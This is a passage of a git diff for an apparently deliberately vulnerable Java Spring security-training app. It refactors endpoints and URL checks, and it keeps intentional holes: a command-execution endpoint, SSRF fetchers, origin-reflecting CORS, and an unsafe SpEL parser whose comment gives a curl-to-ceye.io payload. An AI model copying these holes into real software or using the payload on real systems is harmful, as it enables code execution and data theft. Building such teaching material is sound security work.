-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.3.6" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.5.12" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore:4.4.6" level="project" />
     <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
@@ -200,5 +199,21 @@
     <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.jsoup:jsoup:1.10.2" level="project" />
     <orderEntry type="library" name="Maven: commons-io:commons-io:2.5" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpasyncclient:4.1.4" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore-nio:4.4.10" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger2:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: io.swagger:swagger-annotations:1.5.20" level="project" />
+    <orderEntry type="library" name="Maven: io.swagger:swagger-models:1.5.20" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-spi:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-core:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: net.bytebuddy:byte-buddy:1.8.12" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-schema:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-common:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-spring-web:2.9.2" level="project" />
+    <orderEntry type="library" name="Maven: com.fasterxml:classmate:1.3.3" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-core:1.2.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
+    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 11de6121..6e5c2455 100644
--- a/pom.xml
+++ b/pom.xml
@@ -87,7 +87,7 @@
         <dependency>
             <groupId>org.apache.httpcomponents</groupId>
             <artifactId>httpclient</artifactId>
-            <version>4.3.6</version>
+            <version>4.5.12</version>
         </dependency>
 
         <dependency>
@@ -222,12 +222,32 @@
             <version>1.10.2</version>
         </dependency>
 
-        <!-- ssrf -->
+        <!-- SSRF -->
         <dependency>
             <groupId>commons-io</groupId>
             <artifactId>commons-io</artifactId>
             <version>2.5</version>
         </dependency>
+
+        <!-- SSRF -->
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>httpasyncclient</artifactId>
+            <version>4.1.4</version>
+        </dependency>
+
+        <dependency>
+            <groupId>io.springfox</groupId>
+            <artifactId>springfox-swagger2</artifactId>
+            <version>2.9.2</version>
+        </dependency>
+
+        <dependency>
+            <groupId>io.springfox</groupId>
+            <artifactId>springfox-swagger-ui</artifactId>
+            <version>2.9.2</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/config/SwaggerConfig.java b/src/main/java/org/joychou/config/SwaggerConfig.java
new file mode 100644
index 00000000..c2a73973
--- /dev/null
+++ b/src/main/java/org/joychou/config/SwaggerConfig.java
@@ -0,0 +1,31 @@
+package org.joychou.config;
+
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import springfox.documentation.builders.PathSelectors;
+import springfox.documentation.builders.RequestHandlerSelectors;
+
+import springfox.documentation.spi.DocumentationType;
+import springfox.documentation.spring.web.plugins.Docket;
+import springfox.documentation.swagger2.annotations.EnableSwagger2;
+
+
+@Configuration
+@EnableSwagger2
+public class SwaggerConfig {
+
+    @Value("${swagger.enable}")
+    private boolean enableSwagger;
+
+    @Bean
+    public Docket api() {
+        return new Docket(DocumentationType.SWAGGER_2)
+                .enable(enableSwagger)
+                .select()
+                .apis(RequestHandlerSelectors.any())
+                .paths(PathSelectors.any())
+                .build();
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
index fc346ef6..f62efb2d 100644
--- a/src/main/java/org/joychou/controller/Cookies.java
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -1,6 +1,7 @@
 package org.joychou.controller;
 
 import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 
 import javax.servlet.http.Cookie;
@@ -17,14 +18,14 @@ public class Cookies {
 
     private static String NICK = "nick";
 
-    @RequestMapping(value = "/vuln01")
+    @GetMapping(value = "/vuln01")
     public String vuln01(HttpServletRequest req) {
         String nick = WebUtils.getCookieValueByName(req, NICK); // key code
         return "Cookie nick: " + nick;
     }
 
 
-    @RequestMapping(value = "/vuln02")
+    @GetMapping(value = "/vuln02")
     public String vuln02(HttpServletRequest req) {
         String nick = null;
         Cookie[] cookie = req.getCookies();
@@ -37,7 +38,7 @@ public String vuln02(HttpServletRequest req) {
     }
 
 
-    @RequestMapping(value = "/vuln03")
+    @GetMapping(value = "/vuln03")
     public String vuln03(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
@@ -53,7 +54,7 @@ public String vuln03(HttpServletRequest req) {
     }
 
 
-    @RequestMapping(value = "/vuln04")
+    @GetMapping(value = "/vuln04")
     public String vuln04(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
@@ -68,13 +69,13 @@ public String vuln04(HttpServletRequest req) {
     }
 
 
-    @RequestMapping(value = "/vuln05")
+    @GetMapping(value = "/vuln05")
     public String vuln05(@CookieValue("nick") String nick) {
         return "Cookie nick: " + nick;
     }
 
 
-    @RequestMapping(value = "/vuln06")
+    @GetMapping(value = "/vuln06")
     public String vuln06(@CookieValue(value = "nick") String nick) {
         return "Cookie nick: " + nick;
     }
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index a18e6280..870e809f 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -4,6 +4,7 @@
 import org.joychou.util.LoginUtils;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.CrossOrigin;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
@@ -21,25 +22,25 @@ public class Cors {
 
     private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
 
-    @RequestMapping("/vuln/origin")
-    public static String vuls1(HttpServletRequest request, HttpServletResponse response) {
+    @GetMapping("/vuln/origin")
+    public String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
         response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
         response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
         return info;
     }
 
-    @RequestMapping("/vuln/setHeader")
-    public static String vuls2(HttpServletResponse response) {
+    @GetMapping("/vuln/setHeader")
+    public String vuls2(HttpServletResponse response) {
         // 后端设置Access-Control-Allow-Origin为*的情况下，跨域的时候前端如果设置withCredentials为true会异常
         response.setHeader("Access-Control-Allow-Origin", "*");
         return info;
     }
 
 
-    @CrossOrigin("*")
+    @GetMapping("*")
     @RequestMapping("/vuln/crossOrigin")
-    public static String vuls3() {
+    public String vuls3() {
         return info;
     }
 
@@ -50,8 +51,8 @@ public static String vuls3() {
      * 代码：org/joychou/security/CustomCorsProcessor
      */
     @CrossOrigin(origins = {"joychou.org", "http://test.joychou.me"})
-    @RequestMapping("/sec/crossOrigin")
-    public static String secCrossOrigin() {
+    @GetMapping("/sec/crossOrigin")
+    public String secCrossOrigin() {
         return info;
     }
 
@@ -61,7 +62,7 @@ public static String secCrossOrigin() {
      * 支持自定义checkOrigin
      * 代码：org/joychou/config/CorsConfig.java
      */
-    @RequestMapping("/sec/webMvcConfigurer")
+    @GetMapping("/sec/webMvcConfigurer")
     public CsrfToken getCsrfToken_01(CsrfToken token) {
         return token;
     }
@@ -72,7 +73,7 @@ public CsrfToken getCsrfToken_01(CsrfToken token) {
      * 不支持自定义checkOrigin，因为spring security优先于setCorsProcessor执行
      * 代码：org/joychou/security/WebSecurityConfig.java
      */
-    @RequestMapping("/sec/httpCors")
+    @GetMapping("/sec/httpCors")
     public CsrfToken getCsrfToken_02(CsrfToken token) {
         return token;
     }
@@ -83,7 +84,7 @@ public CsrfToken getCsrfToken_02(CsrfToken token) {
      * 支持自定义checkOrigin
      * 代码：org/joychou/filter/OriginFilter.java
      */
-    @RequestMapping("/sec/originFilter")
+    @GetMapping("/sec/originFilter")
     public CsrfToken getCsrfToken_03(CsrfToken token) {
         return token;
     }
@@ -100,7 +101,7 @@ public CsrfToken getCsrfToken_04(CsrfToken token) {
     }
 
 
-    @RequestMapping("/sec/checkOrigin")
+    @GetMapping("/sec/checkOrigin")
     public String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
 
diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java
index 6063b507..37c4ec18 100644
--- a/src/main/java/org/joychou/controller/Fastjson.java
+++ b/src/main/java/org/joychou/controller/Fastjson.java
@@ -16,7 +16,7 @@ public class Fastjson {
 
     @RequestMapping(value = "/deserialize", method = {RequestMethod.POST})
     @ResponseBody
-    public static String Deserialize(@RequestBody String params) {
+    public String Deserialize(@RequestBody String params) {
         // 如果Content-Type不设置application/json格式，post数据会被url编码
         try {
             // 将post提交的string转换为json
diff --git a/src/main/java/org/joychou/controller/GetRequestURI.java b/src/main/java/org/joychou/controller/GetRequestURI.java
index 87405b62..e500b980 100644
--- a/src/main/java/org/joychou/controller/GetRequestURI.java
+++ b/src/main/java/org/joychou/controller/GetRequestURI.java
@@ -5,6 +5,7 @@
 import org.slf4j.LoggerFactory;
 import org.springframework.util.AntPathMatcher;
 import org.springframework.util.PathMatcher;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
@@ -30,7 +31,7 @@ public class GetRequestURI {
 
     private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
-    @RequestMapping(value = "/exclued/vuln")
+    @GetMapping(value = "/exclued/vuln")
     public String exclued(HttpServletRequest request) {
 
         String[] excluedPath = {"/css/**", "/js/**"};
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index 1bb1face..d87b2a7b 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,7 +1,7 @@
 package org.joychou.controller;
 
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 import java.io.BufferedInputStream;
@@ -17,8 +17,7 @@
 @RequestMapping("/rce")
 public class Rce {
 
-    @RequestMapping("/exec")
-    @ResponseBody
+    @GetMapping("/exec")
     public String CommandExec(String cmd) {
         Runtime run = Runtime.getRuntime();
         StringBuilder sb = new StringBuilder();
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 12384717..a98c9952 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -6,10 +6,7 @@
 import org.joychou.util.WebUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestParam;
-import org.springframework.web.bind.annotation.ResponseBody;
-import org.springframework.web.bind.annotation.RestController;
+import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
@@ -29,17 +26,21 @@ public class SSRF {
     private static Logger logger = LoggerFactory.getLogger(SSRF.class);
 
 
-    @RequestMapping("/urlConnection/vuln")
-    public static String URLConnectionVuln(String url) {
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is Java/1.8.0_102.
+     */
+    @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})
+    public String URLConnectionVuln(String url) {
         return HttpUtils.URLConnection(url);
     }
 
 
-    @RequestMapping("/urlConnection/sec")
-    public static String URLConnectionSec(String url) {
+    @GetMapping("/urlConnection/sec")
+    public String URLConnectionSec(String url) {
 
         // Decline not http/https protocol
-        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+        if (!SecurityUtil.isHttp(url)) {
             return "[-] SSRF check failed";
         }
 
@@ -55,9 +56,12 @@ public static String URLConnectionSec(String url) {
     }
 
 
-    @RequestMapping("/HttpURLConnection/sec")
-    @ResponseBody
-    public static String httpURLConnection(@RequestParam String url) {
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is Java/1.8.0_102.
+     */
+    @GetMapping("/HttpURLConnection/sec")
+    public String httpURLConnection(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
             return HttpUtils.HTTPURLConnection(url);
@@ -69,10 +73,14 @@ public static String httpURLConnection(@RequestParam String url) {
     }
 
 
-    // http://localhost:8080/ssrf/request/sec?url=http://www.baidu.com
-    @RequestMapping("/request/sec")
-    @ResponseBody
-    public static String request(@RequestParam String url) {
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
+     *
+     * http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org
+     */
+    @GetMapping("/request/sec")
+    public String request(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
             return HttpUtils.request(url);
@@ -92,9 +100,8 @@ public static String request(@RequestParam String url) {
      * new URL(String url).openStream()
      * new URL(String url).getContent()
      */
-    @RequestMapping("/openStream")
-    @ResponseBody
-    public static void openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
+    @GetMapping("/openStream")
+    public void openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
         InputStream inputStream = null;
         OutputStream outputStream = null;
         try {
@@ -124,9 +131,12 @@ public static void openStream(@RequestParam String url, HttpServletResponse resp
     }
 
 
-    @RequestMapping("/ImageIO/sec")
-    @ResponseBody
-    public static String ImageIO(@RequestParam String url) {
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is Java/1.8.0_102.
+     */
+    @GetMapping("/ImageIO/sec")
+    public String ImageIO(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
             HttpUtils.imageIO(url);
@@ -140,9 +150,12 @@ public static String ImageIO(@RequestParam String url) {
     }
 
 
-    @RequestMapping("/okhttp/sec")
-    @ResponseBody
-    public static String okhttp(@RequestParam String url) {
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>okhttp/2.5.0</code>.
+     */
+    @GetMapping("/okhttp/sec")
+    public String okhttp(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
@@ -158,11 +171,13 @@ public static String okhttp(@RequestParam String url) {
 
 
     /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
+     *
      * http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/httpclient/sec")
-    @ResponseBody
-    public static String HttpClient(@RequestParam String url) {
+    @GetMapping("/httpclient/sec")
+    public String HttpClient(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
@@ -177,11 +192,13 @@ public static String HttpClient(@RequestParam String url) {
 
 
     /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>Jakarta Commons-HttpClient/3.1</code>.
+     *
      * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/commonsHttpClient/sec")
-    @ResponseBody
-    public static String commonsHttpClient(@RequestParam String url) {
+    @GetMapping("/commonsHttpClient/sec")
+    public String commonsHttpClient(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
@@ -195,11 +212,13 @@ public static String commonsHttpClient(@RequestParam String url) {
     }
 
     /**
+     * The default setting of followRedirects is true.
+     * UserAgent is the useragent of browser.
+     *
      * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
      */
-    @RequestMapping("/Jsoup/sec")
-    @ResponseBody
-    public static String Jsoup(@RequestParam String url) {
+    @GetMapping("/Jsoup/sec")
+    public String Jsoup(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
@@ -214,11 +233,13 @@ public static String Jsoup(@RequestParam String url) {
 
 
     /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>Java/1.8.0_102</code>.
+     *
      * http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/IOUtils/sec")
-    public static String IOUtils(String url) {
-
+    @GetMapping("/IOUtils/sec")
+    public String IOUtils(String url) {
         try {
             SecurityUtil.startSSRFHook();
             HttpUtils.IOUtils(url);
@@ -232,4 +253,14 @@ public static String IOUtils(String url) {
     }
 
 
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is <code>Apache-HttpAsyncClient/4.1.4 (Java/1.8.0_102)</code>.
+     */
+    @GetMapping("/HttpSyncClients/vuln")
+    public String HttpSyncClients(@RequestParam("url") String url) {
+        return HttpUtils.HttpAsyncClients(url);
+    }
+
+
 }
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 6d06ffc7..82163ab2 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -2,6 +2,7 @@
 
 import org.springframework.expression.ExpressionParser;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
@@ -20,7 +21,7 @@ public class SpEL {
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
      */
-    @RequestMapping("/spel/vuln")
+    @GetMapping("/spel/vuln")
     public String rce(String expression) {
         ExpressionParser parser = new SpelExpressionParser();
         // fix method: SimpleEvaluationContext
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
index 8bc0d38b..3b75c7d0 100644
--- a/src/main/java/org/joychou/controller/Test.java
+++ b/src/main/java/org/joychou/controller/Test.java
@@ -3,16 +3,16 @@
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletResponse;
 
-@Controller
+@RestController
 @RequestMapping("/test")
 public class Test {
 
     @RequestMapping(value = "/")
-    @ResponseBody
     public String Index(HttpServletResponse response, String empId) {
 
         System.out.println(empId);
@@ -23,4 +23,14 @@ public String Index(HttpServletResponse response, String empId) {
         return "success";
     }
 
+
+    @RequestMapping(value = "/aa")
+    public void test(HttpServletResponse response, String empId) {
+
+        System.out.println(empId);
+        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
+        cookie.setDomain("taobao.com");
+        cookie.setMaxAge(-1); // forever time
+        response.addCookie(cookie);
+    }
 }
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index c4b04dc5..b4d3c2f0 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -1,12 +1,11 @@
 package org.joychou.controller;
 
 
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 
-import java.net.URI;
-import java.net.URL;
 import java.util.ArrayList;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -32,9 +31,9 @@ public class URLWhiteList {
      * http://localhost:8080/url/vuln/endswith?url=http://aaajoychou.org
      */
     @GetMapping("/vuln/endsWith")
-    public String endsWith(@RequestParam("url") String url) throws Exception {
-        URL u = new URL(url);
-        String host = u.getHost().toLowerCase();
+    public String endsWith(@RequestParam("url") String url) {
+
+        String host = SecurityUtil.gethost(url);
 
         for (String domain : domainwhitelist) {
             if (host.endsWith(domain)) {
@@ -52,9 +51,9 @@ public String endsWith(@RequestParam("url") String url) throws Exception {
      * http://localhost:8080/url/vuln/contains?url=http://bypassjoychou.org
      */
     @GetMapping("/vuln/contains")
-    public String contains(@RequestParam("url") String url) throws Exception {
-        URL u = new URL(url);
-        String host = u.getHost().toLowerCase();
+    public String contains(@RequestParam("url") String url) {
+
+        String host = SecurityUtil.gethost(url);
 
         for (String domain : domainwhitelist) {
             if (host.contains(domain)) {
@@ -70,12 +69,12 @@ public String contains(@RequestParam("url") String url) throws Exception {
      * http://localhost:8080/url/vuln/regex?url=http://aaajoychou.org
      */
     @GetMapping("/vuln/regex")
-    public String regex(@RequestParam("url") String url) throws Exception {
-        URL u = new URL(url);
-        String host = u.getHost().toLowerCase();
+    public String regex(@RequestParam("url") String url) {
 
+        String host = SecurityUtil.gethost(url);
         Pattern p = Pattern.compile("joychou\\.org$");
         Matcher m = p.matcher(host);
+
         if (m.find()) {
             return "Good url.";
         } else {
@@ -93,16 +92,15 @@ public String regex(@RequestParam("url") String url) throws Exception {
      * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(String url) throws Exception {
+    public String url_bypass(String url) {
 
         logger.info("url:  " + url);
-        URL u = new URL(url);
 
-        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
+        if (!SecurityUtil.isHttp(url)) {
             return "Url is not http or https";
         }
 
-        String host = u.getHost().toLowerCase();
+        String host = SecurityUtil.gethost(url);
         logger.info("host:  " + host);
 
         // endsWith .
@@ -121,16 +119,15 @@ public String url_bypass(String url) throws Exception {
      * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
      */
     @GetMapping("/sec/endswith")
-    public String sec_endswith(@RequestParam("url") String url) throws Exception {
+    public String sec_endswith(@RequestParam("url") String url) {
 
         String whiteDomainlists[] = {"joychou.org", "joychou.com"};
 
-        URI uri = new URI(url); // 必须用URI
-        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+        if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
         }
 
-        String host = uri.getHost().toLowerCase();
+        String host = SecurityUtil.gethost(url);
 
         // endsWith .
         for (String domain : whiteDomainlists) {
@@ -147,14 +144,14 @@ public String sec_endswith(@RequestParam("url") String url) throws Exception {
      * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
      */
     @GetMapping("/sec/multi_level_host")
-    public String sec_multi_level_host(@RequestParam("url") String url) throws Exception {
+    public String sec_multi_level_host(@RequestParam("url") String url) {
         String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
 
-        URI uri = new URI(url);
-        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+        if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
         }
-        String host = uri.getHost().toLowerCase();
+
+        String host = SecurityUtil.gethost(url);
 
         // equals
         for (String domain : whiteDomainlists) {
@@ -171,19 +168,19 @@ public String sec_multi_level_host(@RequestParam("url") String url) throws Excep
      * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
      */
     @GetMapping("/sec/array_indexOf")
-    public String sec_array_indexOf(@RequestParam("url") String url) throws Exception {
+    public String sec_array_indexOf(@RequestParam("url") String url) {
 
         // Define muti-level host whitelist.
         ArrayList<String> whiteDomainlists = new ArrayList<>();
         whiteDomainlists.add("bbb.joychou.org");
         whiteDomainlists.add("ccc.bbb.joychou.org");
 
-        URI uri = new URI(url);
-
-        if (!url.startsWith("http://") && !url.startsWith("https://")) {
+        if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
         }
-        String host = uri.getHost().toLowerCase();
+
+        String host = SecurityUtil.gethost(url);
+
         if (whiteDomainlists.indexOf(host) != -1) {
             return "Good url.";
         }
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index f9a4c7fc..931a5688 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -41,7 +41,7 @@ public class XXE {
     private static Logger logger = LoggerFactory.getLogger(XXE.class);
     private static String EXCEPT = "xxe except";
 
-    @RequestMapping(value = "/xmlReader/vuln", method = RequestMethod.POST)
+    @PostMapping("/xmlReader/vuln")
     public String xmlReaderVuln(HttpServletRequest request) {
         try {
             String body = WebUtils.getRequestBody(request);
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 0b383f5d..ee962846 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -9,6 +9,7 @@
 import java.io.IOException;
 import java.io.UnsupportedEncodingException;
 import java.net.URI;
+import java.net.URISyntaxException;
 import java.net.URLDecoder;
 import java.util.ArrayList;
 import java.util.regex.Pattern;
@@ -19,6 +20,34 @@ public class SecurityUtil {
     private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$");
     private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
+
+    /**
+     * Determine if the URL starts with HTTP.
+     *
+     * @param url url
+     * @return true or false
+     */
+    public static boolean isHttp(String url) {
+        return url.startsWith("http://") || url.startsWith("https://");
+    }
+
+
+    /**
+     * Get http url host.
+     *
+     * @param url url
+     * @return host
+     */
+    public static String gethost(String url) {
+        try {
+            URI uri = new URI(url);
+            return uri.getHost().toLowerCase();
+        } catch (URISyntaxException e) {
+            return "";
+        }
+    }
+
+
     /**
      * 同时支持一级域名和多级域名，相关配置在resources目录下url/url_safe_domain.xml文件。
      * 优先判断黑名单，如果满足黑名单return null。
@@ -36,11 +65,10 @@ public static String checkURL(String url) {
         ArrayList<String> blockDomains = WebConfig.getBlockDomains();
 
         try {
-            URI uri = new URI(url);
-            String host = uri.getHost().toLowerCase();
+            String host = gethost(url);
 
             // 必须http/https
-            if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            if (!isHttp(url)) {
                 return null;
             }
 
@@ -66,7 +94,7 @@ public static String checkURL(String url) {
                 }
             }
             return null;
-        } catch (Exception e) {
+        } catch (NullPointerException e) {
             logger.error(e.toString());
             return null;
         }
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 3860cad9..4ef0f046 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -9,6 +9,7 @@
 import org.apache.commons.lang.StringUtils;
 import org.apache.commons.net.util.SubnetUtils;
 import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -24,11 +25,10 @@ public static boolean checkURLFckSSRF(String url) {
 
         ArrayList<String> ssrfSafeDomains = WebConfig.getSsrfSafeDomains();
         try {
-            URI uri = new URI(url);
-            String host = uri.getHost().toLowerCase();
+            String host = SecurityUtil.gethost(url);
 
             // 必须http/https
-            if (!url.startsWith("http://") && !url.startsWith("https://")) {
+            if (!SecurityUtil.isHttp(url)) {
                 return false;
             }
 
@@ -170,16 +170,13 @@ private static String url2host(String url) {
         try {
             // 使用URI，而非URL，防止被绕过。
             URI u = new URI(url);
-            if (!url.startsWith("http://") && !url.startsWith("https://")) {
-                return "";
+            if (SecurityUtil.isHttp(url)) {
+                return u.getHost();
             }
-
-            return u.getHost();
-
+            return "";
         } catch (Exception e) {
             return "";
         }
-
     }
 
 }
diff --git a/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
index de244134..799ca0e5 100644
--- a/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
+++ b/src/main/java/org/joychou/security/ssrf/SocketHookImpl.java
@@ -57,12 +57,7 @@ static void initSocketImpl(Class<?> initSocketImpl) {
             SocketHookFactory.setHook(false);
             throw new RuntimeException("InitSocketImpl failed! Hook stopped!");
         }
-
-//        try {
-//            initSocketImpl = Class.forName("java.net.SocketImpl");
-//        } catch (ClassNotFoundException e) {
-//            System.out.println(e.getMessage());
-//        }
+        
         if (!isInit) {
             createImpl = SocketHookUtils.findMethod(initSocketImpl, "create", new Class<?>[]{boolean.class});
             connectHostImpl = SocketHookUtils.findMethod(initSocketImpl, "connect", new Class<?>[]{String.class, int.class});
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 37eeb69a..571680a2 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -9,6 +9,9 @@
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
 import org.apache.http.impl.client.HttpClients;
